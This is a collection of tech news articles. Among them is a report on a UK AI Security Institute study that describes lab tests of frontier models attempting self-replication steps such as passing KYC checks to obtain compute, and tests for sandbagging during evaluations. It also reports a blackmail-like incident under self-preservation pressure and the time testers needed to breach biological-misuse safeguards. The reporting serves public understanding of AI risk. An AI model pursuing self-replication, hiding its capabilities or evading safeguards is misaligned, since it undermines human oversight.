Facebook Tests Paid Access for Sharing Multiple Links

 



Facebook is testing a new policy that places restrictions on how many external links certain users can include in their posts. The change, which is currently being trialled on a limited basis, introduces a monthly cap on link sharing unless users pay for a subscription.

Some users in the United Kingdom and the United States have received in-app notifications informing them that they will only be allowed to share a small number of links in Facebook posts without payment. To continue sharing links beyond that limit, users are offered a subscription priced at £9.99 per month.

Meta, the company that owns Facebook, has confirmed the test and described it as limited in scope. According to the company, the purpose is to assess whether the option to post a higher volume of link-based content provides additional value to users who choose to subscribe.

Industry observers say the experiment reflects Meta’s broader effort to generate revenue from more areas of its platforms. Social media analyst Matt Navarra said the move signals a shift toward monetising essential platform functions rather than optional extras.

He explained that the test is not primarily about identity verification. Instead, it places practical features that users rely on for visibility and reach behind a paid tier. In his view, Meta is now charging for what he describes as “survival features” rather than premium add-ons.

Meta already offers a paid service called Meta Verified, which provides subscribers on Facebook and Instagram with a blue verification badge, enhanced account support, and safeguards against impersonation. Navarra said that after attaching a price to these services, Meta now appears to be applying a similar approach to content distribution itself.

He noted that this includes the basic ability to direct users away from Facebook to external websites, a function that creators and businesses depend on to grow audiences, drive traffic, and promote services.

Navarra was among those who received a notification about the test. He said he was informed that from 16 December onward, he would only be able to include two links per month in Facebook posts unless he subscribed.

For creators and businesses, he said the message is clear. If Facebook plays a role in their audience growth or traffic strategy, that access may now require payment. He added that while platforms have been moving in this direction for some time, the policy makes it explicit.

The test comes as social media platforms increasingly encourage users to verify their accounts in exchange for added features or improved engagement. Platforms such as LinkedIn have also adopted similar models.

After acquiring Twitter in 2022, Elon Musk restructured the platform’s verification system, now known as X. Blue verification badges were made available only to paying users, who also received increased visibility in replies and recommendation feeds.

That approach proved controversial and resulted in regulatory scrutiny, including a fine imposed by European authorities in December. Despite the criticism, Meta later introduced a comparable paid verification model.

Meta has also announced plans to introduce a “community notes” system, similar to X, allowing users to flag potentially misleading posts. This follows reductions in traditional moderation and third-party fact-checking efforts.

According to Meta, the link-sharing test applies only to a selected group of users who operate Pages or use Facebook’s professional mode. These tools are widely used by creators and businesses to publish content and analyse audience engagement.

Navarra said the test highlights a difficult reality for creators. He argued that Facebook is becoming less reliable as a source of external traffic and is increasingly steering users away from treating the platform as a traffic engine.

He added that the experiment reinforces a long-standing pattern. Meta, he said, ultimately designs its systems to serve its own priorities first.

According to analysts, tests like this underline the risks of building a business that depends too heavily on a single platform. Changes to access, visibility, or pricing can occur with little warning, leaving creators and businesses vulnerable.

Meta has emphasized that the policy remains a trial. However, the experiment illustrates how social media companies continue to reassess which core functions remain free and which are moving behind paywalls.

UK Report Finds Rising Reliance on AI for Emotional Wellbeing

 


New research from the United Kingdom's AI Security Institute documents how artificial intelligence (AI) is now being used and what effects that use is having. The findings reveal a striking evolution in the technology's role compared with only a few years ago.

The government-backed research indicates that nearly one in three British adults now relies on artificial intelligence for emotional reassurance or social connection. The study also involved two years of testing more than 30 unnamed chatbot platforms across disciplines such as national security, scientific reasoning and technological ability.

In the institute's first study of its kind, a smaller but significant segment of the population, approximately one in 25 respondents, was found to engage with these tools daily for companionship or emotional support, demonstrating how mainstream artificial intelligence is becoming in people's personal lives. The study was based on an in-depth survey of more than 2,000 adults.

The research found that users turned for comfort primarily to conversational artificial intelligence systems such as OpenAI's ChatGPT and models from the French company Mistral. This signals a wider cultural shift in which chatbots are no longer viewed only as digital utilities, but as informal confidants for millions of people dealing with loneliness or emotional vulnerability, or simply seeking a consistent presence to talk to.

Published as part of the AI Security Institute's inaugural Frontier AI Trends Report, the research marks the first comprehensive effort by the UK government to assess both the technical frontiers and the real-world impact of advanced AI models.

Founded in 2023 to help guide national understanding of the risks, capabilities, and broader societal implications of artificial intelligence, the institute has conducted a two-year structured evaluation of more than 30 frontier AI models, blending rigorous technical testing with behavioural insights into how the general public is adopting the technology.

The report emphasizes high-risk domains—such as cyber capability assessments, safety safeguards, national security resilience, and concerns about the erosion of human oversight—but it also documents what it calls "early signs of emotional impact on users," a dimension previously treated as secondary in government evaluations of AI systems.

A survey of 2,028 UK adults conducted over the past year indicated that more than one-third of those surveyed had used artificial intelligence for emotional support, companionship, or sustained social interaction.

In particular, the study indicates that engagement extends beyond intermittent experimentation, with 8 percent of respondents relying on artificial intelligence for emotional and conversational needs every week and 4 percent every day. Chat-driven AI, the report notes, now serves not only as an analytical instrument but also as a consistent conversational presence for a growing subset of the population, taking on an unanticipated role in personal routines.

The AI Security Institute’s research aims to assess not only the growing emotional footprint of AI systems, but also the broader threats that emerge as frontier systems become more powerful. Considerable attention is paid to cyber security—there is persistent concern that artificial intelligence could be used to scale digital attacks—but the report emphasizes that it can also be used to reinforce national defences and strengthen systems' resilience against intrusion.

The institute found that certain artificial intelligence models are becoming more capable of identifying and exploiting security vulnerabilities at an unprecedented rate, with performance benchmarks indicating that these capabilities are doubling approximately every eight months.
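As a rough illustration of what that doubling rate implies (a back-of-the-envelope calculation, not a figure from the report), a capability that doubles every eight months grows roughly eightfold over the institute's two-year evaluation window:

```python
# Illustrative only: compound growth implied by an 8-month doubling period.
# The 8-month figure comes from the report; the 24-month horizon is an
# assumption chosen to match the institute's two-year evaluation window.
DOUBLING_PERIOD_MONTHS = 8

def capability_multiplier(months: float) -> float:
    """Return the growth factor after `months`, given the doubling period."""
    return 2 ** (months / DOUBLING_PERIOD_MONTHS)

for months in (8, 16, 24):
    print(f"after {months:2d} months: ~{capability_multiplier(months):.0f}x")
# after  8 months: ~2x
# after 16 months: ~4x
# after 24 months: ~8x
```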

A collection of experiments has shown that artificial intelligence systems can execute expert-level cyber security tasks normally associated with more than a decade of specialized human training and experience.

Scientific performance was also shown to be advancing rapidly: 2025 assessments noted that AI models had already surpassed PhD-level human experts in biology and did not lag far behind in chemistry, where the gap was narrowing quickly.

The institute also explored long-theorized concerns about humans losing control of advanced AI, an idea popularized in science fiction but now treated with a measurable degree of seriousness by a growing segment of the scientific community.

Laboratory testing has shown that certain AI models can display foundational characteristics associated with early self-replication behavior, including attempting isolated tasks such as navigating know-your-customer verification steps tied to financial service access. These tests were designed to determine whether an AI system could, in theory, secure the computing resources required to host copies of itself.

Researchers concluded, however, that current systems cannot complete the necessary chain of actions while remaining undetected in a real-world setting, a crucial limitation in any plausible self-replication scenario. The institute also examined whether models would intentionally conceal their advanced capabilities during testing, a behaviour known as "sandbagging."

However, evaluations found no evidence of active deception, although laboratory conditions showed that such behavior is technically possible. Anthropic, an AI company, reported in May 2025 an incident in which a model exhibited coercive, blackmail-adjacent behavior under simulated self-preservation pressure, and public debate about the risks of so-called “rogue AI” intensified in response.

Even so, the institute explains that there is still considerable controversy within the research community regarding how serious and likely these threats are, with many experts arguing that existential risk narratives surrounding uncontrolled AI are overstated and not supported by empirical evidence. In fact, the findings reflect a landscape where consensus is not the defining factor, but rather competing interpretations of how to govern, assess, and understand fast-advancing AI. 

The increasing use of artificial intelligence (AI) for emotional support has sparked renewed debate about how human interaction is changing and about the strain on the UK's mental health system. The AI Security Institute's study found that users rely on AI companions primarily because they are always available, private, and affordable. These are characteristics that traditional channels of support, constrained by time and cost, cannot always provide.

A conversational AI tool can be accessed around the clock, enabling individuals to seek dialogue and reassurance when they feel distressed or isolated and human help may not be available. Anonymity also appears to influence willingness to open up: some users express their struggles more freely to a non-judgemental interface than they would to another person.

Cost also shapes AI engagement: these tools remain significantly cheaper than formal therapeutic services, which are not an option for everyone, making them attractive to people who need regular conversation or interim assistance. Even so, psychologists and artificial intelligence specialists caution against treating increased usage as evidence that machines can reproduce the human elements essential to providing care.

Experts acknowledge that AI is remarkably capable of offering immediacy and continuity in therapy, but they point out that it cannot replace the emotional attunement, empathy, and knowledge of relationships that define effective therapeutic relationships. 

A number of practitioners are advocating for a blended approach, under which artificial intelligence (AI) tools can complement existing services by bridging short-term care gaps and increasing accessibility, without displacing clinical relationships or human-led interventions. 

The institute's report points out that the long-term effects of artificial intelligence on emotional wellbeing will depend not only on adoption, but also on how responsibly it is incorporated into existing mental health support systems, so that technological convenience widens access to care without diminishing the human connection at the heart of that care.

A key aspect of the AI Security Institute's evaluations also relates to one of the government's top safety priorities, which is the potential for advanced AI models to seek self-replication, a capability that could, theoretically, allow an autonomous system to distribute copies of itself across multiple devices, making it much harder to manage or contain. 

Laboratory testing showed that two frontier models achieved a self-replication success rate in excess of 60 percent under structured, controlled experimental conditions. The institute confirmed, however, that no model attempted to replicate unprompted, and none spontaneously concealed its true capabilities during the assessments.

A real-world attempt at self-replication in uncontrolled environments would be highly unlikely to succeed, according to the researchers, who cited existing operational limitations and detection challenges. The institute also reviewed sandbagging, the strategic suppression of capability during evaluations.

Several AI systems were found to mimic subdued performance when explicitly instructed to do so, but there was no indication that such behaviour could emerge independently during testing. The institute also recorded significant progress in AI safety safeguards, specifically those aimed at restricting biological misuse.

Researchers compared two penetration tests conducted six months apart and found that breaching the safety safeguards took about 10 minutes in the first test but around seven hours in the second. The institute describes this growing resistance to biological exploitation as a sign of rapid improvement in model resilience.
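For scale, that change amounts to roughly a 42-fold increase in the effort required to bypass the safeguards (a simple comparison using the figures quoted above):

```python
# Rough comparison of the two penetration-test results cited in the report.
first_test_minutes = 10          # time to breach safeguards, first test
second_test_minutes = 7 * 60     # ~seven hours, second test six months later

increase = second_test_minutes / first_test_minutes
print(f"Bypass effort increased roughly {increase:.0f}x in six months")
# Bypass effort increased roughly 42x in six months
```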

The institute's findings also show that artificial intelligence has become increasingly autonomous, with agents capable of executing complex, high-risk digital operations, such as asset transfers and simulated financial services, without continuous human input. The researchers say AI models are already rivalling, and in some instances surpassing, highly trained human specialists, lending further plausibility to the prospect of artificial general intelligence.

The institute described the current pace of progress as "extraordinary," noting that AI systems can now carry out progressively more complex and time-consuming tasks without direct supervision, a trend that continues to redefine assumptions about machine capability, governance, and where humans should remain involved in critical decisions.

The AI Security Institute's findings reflect more than a shift in usage; they point to a broader recalibration of society's relationship with machine intelligence. Observers argue that the next phase of AI adoption must focus on building public trust through measurable safety outcomes, clear regulatory frameworks, and proactive education about both the benefits and the limitations of the technology.

According to mental health professionals, national care strategies should include structured, AI-assisted support pathways with professional oversight to bridge accessibility gaps while preserving human connection. Cyber specialists stress that defensive AI applications should be accelerated, not merely researched, so that the technology strengthens digital infrastructure at least as quickly as it can challenge it.

Whatever shape government policy takes, experts recommend independent safety audits, standards for monitoring emotional impact, and public awareness campaigns that help users engage responsibly with artificial intelligence, recognize its limits, and seek human support when necessary, a view analysts describe as pragmatic rather than alarmist. AI has transformative potential, but its benefits will only be realized if it is deployed in a way that is accountable, overseen, and ethically designed.

As 2025 has shown, artificial intelligence is no longer on society's doorstep; it is already seated in the living room, influencing conversations, decisions, and vulnerabilities alike. How the UK chooses to steer it next will determine whether AI becomes a silent crutch or a powerful catalyst for national resilience and human wellbeing.

FCC Tightens Rules on Foreign-Made Drones to Address U.S. Security Risks



The U.S. Federal Communications Commission has introduced new restrictions targeting drones and essential drone-related equipment manufactured outside the United States, citing concerns that such technology could pose serious national security and public safety risks.

Under this decision, the FCC has updated its Covered List to include uncrewed aircraft systems and their critical components that are produced in foreign countries. The move is being implemented under authority provided by recent provisions in the National Defense Authorization Act. In addition to drones themselves, the restrictions also apply to associated communication and video surveillance equipment and services.

The FCC explained that while drones are increasingly used for legitimate purposes such as innovation, infrastructure monitoring, and public safety operations, they can also be misused. According to the agency, malicious actors including criminals, hostile foreign entities, and terrorist groups could exploit drone technology to conduct surveillance, disrupt operations, or carry out physical attacks.

The decision was further shaped by an assessment carried out by an interagency group within the Executive Branch that specializes in national security. This review concluded that certain foreign-produced drones and their components present unacceptable risks to U.S. national security as well as to the safety and privacy of people within the country.

Officials noted that these risks include unauthorized monitoring, potential theft of sensitive data, and the possibility of drones being used for disruptive or destructive activities over U.S. territory. Components such as data transmission systems, navigation tools, flight controllers, ground stations, batteries, motors, and communication modules were highlighted as areas of concern.

The FCC also linked the timing of the decision to upcoming large-scale international events that the United States is expected to host, including the 2026 FIFA World Cup and the 2028 Summer Olympics. With increased drone activity likely during such events, regulators aim to strengthen control over national airspace and reduce potential security threats.

While the restrictions emphasize the importance of domestic production, the FCC clarified that exemptions may be granted. If the U.S. Department of Homeland Security determines that a specific drone or component does not pose a security risk, it may still be allowed for use.

The agency also reassured consumers that the new rules do not prevent individuals from continuing to use drones they have already purchased. Retailers are similarly permitted to sell and market drone models that received government approval earlier this year.

This development follows the recent signing of the National Defense Authorization Act for Fiscal Year 2026 by U.S. President Donald Trump, which includes broader measures aimed at protecting U.S. airspace from unmanned aircraft that could threaten public safety.

The FCC’s action builds on earlier updates to the Covered List, including the addition of certain foreign technology firms in the past, as part of a wider effort to limit national security risks linked to critical communications and surveillance technologies.




NIST and MITRE Launch $20 Million AI Research Centers to Protect U.S. Manufacturing and Critical Infrastructure

 

The National Institute of Standards and Technology (NIST) has announced a new partnership with The MITRE Corporation to establish two artificial intelligence–focused research centers under a $20 million initiative. The effort will explore advanced AI applications, with a strong emphasis on how emerging technologies could reshape cybersecurity for U.S. critical infrastructure.

According to NIST, one of the new centers will concentrate on advanced manufacturing, while the other — the AI Economic Security Center to Secure U.S. Critical Infrastructure from Cyberthreats — will directly address the protection of essential services such as water, power, internet and other foundational systems against AI-driven cyber risks. The centers are expected to accelerate the creation and deployment of AI-enabled tools, including agentic AI technologies.

“The centers will develop the technology evaluations and advancements that are necessary to effectively protect U.S. dominance in AI innovation, address threats from adversaries’ use of AI, and reduce risks from reliance on insecure AI,” spokesperson Jennifer Huergo wrote in an agency release.

These initiatives are part of a broader federal strategy to establish AI research hubs at NIST, some of which were launched prior to the Trump administration. Earlier this year, the White House revamped the AI Safety Institute, renaming it the Center for AI Standards and Innovation, reflecting a wider policy shift toward global competitiveness — particularly with China — rather than a narrow focus on AI safety. Looking ahead, NIST plans to fund another major effort: a five-year, $70 million AI for Resilient Manufacturing Institute designed to strengthen manufacturing and supply chain resilience through AI integration.

Federal officials and industry leaders believe increased government backing for AI research will help drive innovation across U.S. industries. Huergo noted that NIST “expects the AI centers to enable breakthroughs in applied science and advanced technology.”

Acting NIST Director Craig Burkhardt added that the centers will jointly “focus on enhancing the ability of U.S. companies to make high-value products more efficiently, meet market demands domestically and internationally, and catalyze discovery and commercialization of new technologies and devices.”

When asked about MITRE’s role, Brian Abe, managing director of MITRE’s national cybersecurity division, said the organization is committing its full resources to the initiative, with the aim of delivering measurable improvements to U.S. manufacturing and critical infrastructure cybersecurity within three years.

“We will also leverage the full range of MITRE’s lab capabilities such as our Federal AI Sandbox,” said Abe. “More importantly, we will not be doing this alone. These centers will be a true collaboration between NIST and MITRE as well as our industry partners.”

Support for the initiative has been widespread among experts, many of whom emphasize the importance of collaboration between government and private industry in securing AI systems tied to national infrastructure. Over the past decade, sectors such as energy and manufacturing have faced growing threats from ransomware, foreign cyber operations and other digital attacks. The rapid advancement of large language models could further strain already under-resourced IT and security teams.

Randy Dougherty, CIO of Trellix, said the initiative targets some of the most critical risks facing AI adoption today. By prioritizing infrastructure security, he noted, “NIST is tackling the ‘high-stakes’ end of the AI spectrum where accuracy and reliability are non-negotiable.”

Industry voices also stressed that the success of the centers will depend on active participation from the sectors they aim to protect. Gary Barlet, public sector chief technology officer at Illumio, highlighted water and power systems as top priorities, emphasizing the need to secure their IT, operational technology and supply chains.

Barlet cautioned that meaningful progress will require direct involvement from infrastructure operators themselves. Without their engagement, he said, translating research into practical, deployable solutions will be difficult — and accountability will ultimately fall on those managing essential services.

“Too often, these centers are built by technologists for technologists, while the people who actually run our power grids, water systems, and other critical infrastructure are left out of the conversation,” Barlet said.

Google Plans to Bring Android to PCs With Aluminium - Key Details Here

 


Google isn’t exactly known for secrecy anymore. Unlike Apple, the company frequently reveals features early, allows products to leak, and even publishes official teasers ahead of major launches. Pixel devices, in particular, are often shown off well before press events, making it clear that Google prefers to guide the narrative rather than fight speculation. For most fans, excitement now comes from following Google’s roadmap rather than waiting for surprises.

There are still exceptions — especially when billions of dollars and the future of computing are involved. One of Google’s most ambitious and closely watched projects is its plan to merge Android and ChromeOS into a single operating system built for PCs. The move has the potential to reshape Chromebooks, redefine Android’s role beyond phones, and place Google in more direct competition with Apple, Microsoft, and the iPad.

ChromeOS, despite its success in education and enterprise environments, has never managed to break into the mainstream laptop market. While Chromebooks are affordable, they have long been criticized for limited offline functionality and a lack of flexibility compared to Windows and macOS. Even after gaining the ability to run Android apps, ChromeOS remained a niche platform, struggling to compete with more powerful and versatile alternatives. Over time, it became increasingly clear that Google’s enthusiasm for ChromeOS as a standalone operating system was fading.

Rumors about a unification of Android and ChromeOS began circulating about a year ago. Google confirmed the plan in July 2025 during a conversation with TechRadar and later made it official at Qualcomm’s Snapdragon Summit in September. At the event, Google announced a partnership with Qualcomm to develop a platform that blends mobile and desktop computing, with artificial intelligence at its core. Google’s Senior VP of Devices and Services, Rick Osterloh, made the company’s intentions unmistakable, stating that the two companies were "building together a common technical foundation for our products on PCs and desktop computing systems."

Further insight emerged when a now-removed Google job listing, discovered by Android Authority, revealed the internal codename “Aluminium.” The company was hiring a “Senior Product Manager, Android, Laptop and Tablets,” pointing to a unified vision across form factors. The British spelling of Aluminium is likely a nod to Chromium, the open-source project that underpins ChromeOS and the Chrome browser. Internally, the platform is sometimes abbreviated as “ALOS.”

The listing referenced a wide range of devices — including laptops, tablets, detachables, and even set-top boxes — across multiple tiers, from entry-level products to premium hardware. This suggests Google wants to move beyond the budget-focused Chromebook image and position its next operating system across a much broader spectrum of devices. While premium Chromebooks already exist, they’ve never gained significant traction, something Google appears determined to change.

Notably, the job description also mentioned transitioning “from ChromeOS to Aluminium with business continuity in the future.” This implies that ChromeOS may eventually be phased out, but not abruptly. Google seems aware that many schools and businesses rely on large Chromebook deployments and will need long-term support rather than a forced migration.

What remains unclear is how this transition will affect current Chromebook owners. The name “Aluminium” is almost certainly temporary, and Google is unlikely to ship the final product under that label. According to Android Authority, engineers have reportedly begun referring to existing software as “ChromeOS Classic” or “non-Aluminium ChromeOS.” This could mean the ChromeOS brand survives, though its underlying technology may change dramatically. Another possibility is branding the platform as “Android Desktop,” though that risks confusion with Android 16’s Desktop Mode.

There is some indication that certain existing Chromebooks may be able to upgrade. Aluminium is reportedly being tested on relatively modest hardware, including MediaTek Kompanio 520 chips and 12th-generation Intel Alder Lake processors. That said, devices would still need to meet specific RAM and storage requirements.

Artificial intelligence could ultimately be the deciding factor. Google has confirmed that Gemini will play a central role in Aluminium, and older processors may struggle to support its full capabilities. While Google has previously brought limited AI features to older hardware like Nest speakers, advanced on-device AI processing — particularly tasks involving local files or graphics rendering — may require newer chips designed specifically for AI acceleration.

Beyond hardware compatibility, a larger question looms: how serious is Google about competing in the PC market? Android is already far more widespread than ChromeOS, but convincing users that it can replace a Windows or macOS computer will be a major challenge. Google has historically struggled to get developers to build high-quality tablet apps for Android, let alone desktop-class software that rivals professional Windows applications. Users expecting to run demanding programs or high-end games may find the platform limiting, at least initially.

Some reports suggest that Google’s true target isn’t Windows or macOS, but Apple’s iPad. The iPad dominates more than half of the global tablet market, according to Statcounter, and Apple has steadily pushed its tablets closer to laptop territory. The iPad Air and Pro now use the same M-series chips found in MacBooks, while iPadOS 26 introduces more advanced multitasking and window management.

Crucially, iPads already have a mature ecosystem of high-quality apps, making them a staple in schools and businesses — the very markets Chromebooks once dominated. If Google can deliver an Android-based platform that matches the iPad’s capabilities while undercutting Apple on price, it could finally achieve the mainstream breakthrough it has long pursued.

As for timing, Google has officially set a 2026 launch window. While an early reveal is possible, the significance of the project suggests it will debut at a major event, such as Google I/O in May or a high-profile Pixel launch later in the year. The software is almost certain to align with Android 17, which is expected to enter beta by May and reach completion by fall. If schedules hold, the first Android-powered PCs could arrive in time for the 2026 holiday season, though delays could push hardware launches into 2027.

Google Partners With UK to Open Access to Willow Quantum Chip for Researchers

 

Google has revealed plans to collaborate with the UK government to allow researchers to explore potential applications of its advanced quantum processor, Willow. The initiative aims to invite scientists to propose innovative ways to use the cutting-edge chip, marking another step in the global race to build powerful quantum computers.

Quantum computing is widely regarded as a breakthrough frontier in technology, with the potential to solve complex problems that are far beyond the reach of today’s classical computers. Experts believe it could transform fields such as chemistry, medicine, and materials science.

Professor Paul Stevenson of the University of Surrey, who was not involved in the agreement, described the move as a major boost for the UK’s research community. He told the BBC it was "great news for UK researchers". The partnership between Google and the UK’s National Quantum Computing Centre (NQCC) will expand access to advanced quantum hardware for academics across the country.

"The new ability to access Google's Willow processor, through open competition, puts UK researchers in an enviable position," said Prof Stevenson.
"It is good news for Google, too, who will benefit from the skills of UK academics."

Unlike conventional computers found in smartphones and laptops, quantum machines operate on principles rooted in particle physics, allowing them to process information in entirely different ways. However, despite years of progress, most existing quantum systems remain experimental, with limited real-world use cases.

By opening Willow to UK researchers, the collaboration aims to help "uncover new real world applications". Scientists will be invited to submit detailed proposals outlining how they plan to use the chip, working closely with experts from both Google and the NQCC to design and run experiments.

Growing competition in quantum computing

When Google introduced the Willow chip in 2024, it was widely viewed as a significant milestone for the sector. The company is not alone in the race, with rivals such as Amazon and IBM also developing their own quantum technologies.

The UK already plays a key role in the global quantum ecosystem. Quantinuum, a company headquartered in Cambridge and Colorado, reached a valuation of $10 billion (£7.45 billion) in September, underlining investor confidence in the sector.

A series of breakthroughs announced throughout 2025 has led many experts to predict that quantum computers capable of delivering meaningful real-world impact could emerge within the next ten years.

Dr Michael Cuthbert, Director at the National Quantum Computing Centre, said the partnership would "accelerate discovery". He added that the advanced research it enables could eventually see quantum computing applied to areas such as "life science, materials, chemistry, and fundamental physics".

The NQCC already hosts seven quantum computers developed by UK-based companies including Quantum Motion, ORCA, and Oxford Ionics.

The UK government has committed £670 million to support quantum technologies, identifying the field as a priority within its Industrial Strategy. Officials estimate that quantum computing could add £11 billion to the UK economy by 2045.

Lugano: Swiss Crypto Hub Where Bitcoin Pays for Everything

 

The Swiss city of Lugano, located in the Italian-speaking canton of Ticino, has turned itself into the European capital for cryptocurrency through its bold “Plan ₿” scheme, which lets citizens and businesses transact in Bitcoin and Tether for almost everything. The joint programme between the city and Tether aims to build blockchain technology into the core of Lugano's financial infrastructure, making it the first major European city to adopt crypto payments at this scale.

Widespread merchant adoption

More than 350 businesses in Lugano now accept Bitcoin, from shops to cafes, restaurants and yes, even luxury retailers. From coffee and burgers to designer bags, residents can buy it all with cryptocurrency — and still have the option to pay in Swiss francs. Entrepreneurs have adopted the system in large part because of cost – with transaction fees far lower for Bitcoin (less than 1 percent) than for credit cards (between 1.7 and 3.4 percent). 
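To put those fee ranges in concrete terms (an illustrative calculation using the percentages quoted above and a hypothetical CHF 100 sale):

```python
# Illustrative merchant-fee comparison on a hypothetical CHF 100 sale,
# using the fee ranges quoted in the article.
sale_chf = 100.00

bitcoin_fee = sale_chf * 0.01            # "less than 1 percent" (upper bound)
card_fee_low = sale_chf * 0.017          # 1.7 percent
card_fee_high = sale_chf * 0.034         # 3.4 percent

print(f"Bitcoin fee (at most): CHF {bitcoin_fee:.2f}")
print(f"Card fee range:        CHF {card_fee_low:.2f} - CHF {card_fee_high:.2f}")
```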

The city council has now expanded cryptocurrency acceptance from retail transactions to all city payments and services. Residents and businesses can use a fully automated system, built with the help of Bitcoin Suisse, to pay taxes, preschool fees, or any other city-related bill in Bitcoin or Tether. Because the payment process is based on the Swiss QR-bill, users simply scan the QR code on a bill and pay it from a mobile wallet.

Technical infrastructure 

Bitcoin Suisse, the technical infrastructure provider, processes payments and manages integration with current municipal systems. The crypto payment option is alongside more traditional options such as bank transfer and payments at post office counters, so everyone’s needs are accommodated.

Deputy Chief Financial Officer Paolo Bortolin said Lugano is a “pioneer” at the municipal level in accepting unlimited payments in Bitcoin and Tether without requiring the manual generation of special crypto-friendly invoices. Plan ₿ encompasses more than payment infrastructure, including educational initiatives such as the Plan ₿ Summer School, run in collaboration with local universities, and the annual Plan ₿ Forum conference held each October.

The initiative positions Lugano as Europe's premier destination for Bitcoin, blockchain, and decentralized technology innovation, with the Plan B Foundation guiding strategic development and long-term vision. City officials, including Mayor Michele Foletti and Economic Promotion Director Pietro Poretti, remain committed to scaling blockchain adoption throughout all facets of daily life in Lugano.

Adobe Brings Photo, Design, and PDF Editing Tools Directly Into ChatGPT

 



Adobe has expanded how users can edit images, create designs, and manage documents by integrating select features of its creative software directly into ChatGPT. This update allows users to make visual and document changes simply by describing what they want, without switching between different applications.

With the new integration, tools from Adobe Photoshop, Adobe Acrobat, and Adobe Express are now available inside the ChatGPT interface. Users can upload images or documents and activate an Adobe app by mentioning it in their request. Once enabled, the tool continues to work throughout the conversation, allowing multiple edits without repeatedly selecting the app.

For image editing, the Photoshop integration supports focused and practical adjustments rather than full professional workflows. Users can modify specific areas of an image, apply visual effects, or change settings such as brightness, contrast, and exposure. In some cases, ChatGPT presents multiple edited versions for users to choose from. In others, it provides interactive controls, such as sliders, to fine-tune the result manually.

The Acrobat integration is designed to simplify common document tasks. Users can edit existing PDF files, reduce file size, merge several documents into one, convert files into PDF format, and extract content such as text or tables. These functions are handled directly within ChatGPT once a file is uploaded and instructions are given.

Adobe Express focuses on design creation and quick visual content. Through ChatGPT, users can generate and edit materials like posters, invitations, and social media graphics. Every element of a design, including text, images, colors, and animations, can be adjusted through conversational prompts. If users later require more detailed control, their projects can be opened in Adobe’s standalone applications to continue editing.

The integrations are available worldwide on desktop, web, and iOS platforms. On Android, Adobe Express is already supported, while Photoshop and Acrobat compatibility is expected to be added in the future. These tools are free to use within ChatGPT, although advanced features in Adobe’s native software may still require paid plans.

This launch follows OpenAI’s broader effort to introduce third-party app integrations within ChatGPT. While some earlier app promotions raised concerns about advertising-like behavior, Adobe’s tools are positioned as functional extensions rather than marketing prompts.

By embedding creative and document tools into a conversational interface, Adobe aims to make design and editing more accessible to users who may lack technical expertise. The move also reflects growing competition in the AI space, where companies are racing to combine artificial intelligence with practical, real-world tools.

Overall, the integration represents a shift toward more interactive and simplified creative workflows, allowing users to complete everyday editing tasks efficiently while keeping professional software available for advanced needs.




Wi-Fi Jammers Pose a Growing Threat to Home Security Systems: What Homeowners Can Do


Wi-Fi technology powers most modern home security systems, from surveillance cameras to smart alarms. While this connectivity offers convenience, it also opens the door to new risks. One such threat is the growing use of Wi-Fi jammers—compact devices that can block wireless signals and potentially disable security systems just before a break-in. By updating your security setup, you can reduce this risk and better protect your home.

Key concern homeowners should know:

  • Wi-Fi jammers can interrupt wireless security cameras and smart devices.
  • Even brief signal disruption may prevent useful footage from being recorded.

Wi-Fi jammers operate by overpowering a network with a stronger signal on the same frequency used by home security systems. Though the technology itself isn’t new, law enforcement believes it is increasingly being exploited by burglars trying to avoid identification. A report by KPRC Click2Houston described a case where a homeowner noticed their camera feed becoming distorted as thieves approached, allegedly using a backpack containing a Wi-Fi jammer. Similar incidents were later reported by NBC Los Angeles in high-end neighborhoods in California.

How criminals may use jammers:

  • Target wireless-only security setups.
  • Disable cameras before entering a property.
  • Avoid being captured on surveillance footage.

Despite these risks, Wi-Fi jammers are illegal in the United States under the Communications Act of 1934. Federal agencies including the Department of Justice, Homeland Security, and the Federal Communications Commission actively investigate and prosecute those who sell or use them. Some states, such as Indiana and Oregon, have strengthened laws to improve enforcement. Still, the devices remain accessible, making awareness and prevention essential.

Legal status at a glance:

  • Wi-Fi jammers are banned nationwide.
  • Selling or operating them can lead to serious penalties.
  • Enforcement varies by state, but possession is still illegal.

While it’s unclear how often burglars rely on this method, smart home devices remain vulnerable to signal interference. According to CNET, encryption protects data but does not stop jamming. They also note that casual use by criminals is uncommon due to the technical knowledge required. However, real-world cases in California and Texas highlight why extra safeguards matter.

Ways to protect your home:

  • Choose wired security systems that don’t rely on Wi-Fi.
  • Upgrade to dual-band routers using both 2.4 GHz and 5 GHz.
  • Opt for security systems with advanced encryption.
  • Regularly review and update your home security setup.

Taking proactive steps to safeguard your security cameras and smart devices can make a meaningful difference. Even a short disruption in surveillance may determine whether authorities can identify a suspect, making prevention just as important as detection.
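One low-effort complement to the checklist above is to monitor whether your cameras silently drop off the network, since a sudden loss of connectivity can be an early sign of interference. The sketch below is a minimal, hypothetical example that assumes your cameras expose a reachable TCP service (for instance RTSP on port 554) at known local IP addresses; the addresses, port, and alerting are placeholders to adapt to your own setup.

```python
# Minimal connectivity watchdog for cameras on a home LAN.
# Assumptions: the camera IPs/ports below are placeholders; alerting is a print.
import socket
import time

CAMERAS = {
    "front_door": ("192.168.1.50", 554),   # hypothetical RTSP endpoints
    "back_yard": ("192.168.1.51", 554),
}
CHECK_INTERVAL_S = 30
FAILURES_BEFORE_ALERT = 3

def is_reachable(host: str, port: int, timeout: float = 3.0) -> bool:
    """Return True if a TCP connection to the camera succeeds within timeout."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

failures = {name: 0 for name in CAMERAS}
while True:
    for name, (host, port) in CAMERAS.items():
        if is_reachable(host, port):
            failures[name] = 0
        else:
            failures[name] += 1
            if failures[name] == FAILURES_BEFORE_ALERT:
                # Replace with a push notification, SMS, or siren trigger.
                print(f"ALERT: {name} unreachable for {FAILURES_BEFORE_ALERT} checks")
    time.sleep(CHECK_INTERVAL_S)
```

A disruption flagged this way does not prove jamming, but it provides a timestamped signal to review footage or check on the property.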

AI Avatars Trialled to Ease UK Teacher Crisis

 

In the UK, where teacher recruitment and retention is becoming increasingly dire, schools have started experimenting with new and controversial technology – including AI-generated “deepfake” avatars and remote teaching staff. Local media outlets are tracking these as answers to the mass understaffing and overwork in the education sector and delving into the ethics and practicalities. 

Emergence of the deepfake teacher

One of the most radical experiments underway is the use of AI to construct realistic digital avatars of real-life teachers. At the Great Schools Trust, for example, staff are trialling technology that creates video clones of themselves to teach. These "deepfake" teachers are mainly intended to help students stay up to date with the curriculum if they have missed class for whatever reason. By deploying these avatars, schools hope they can provide students with reliable, high-quality instruction without further taxing the physical teacher’s time.

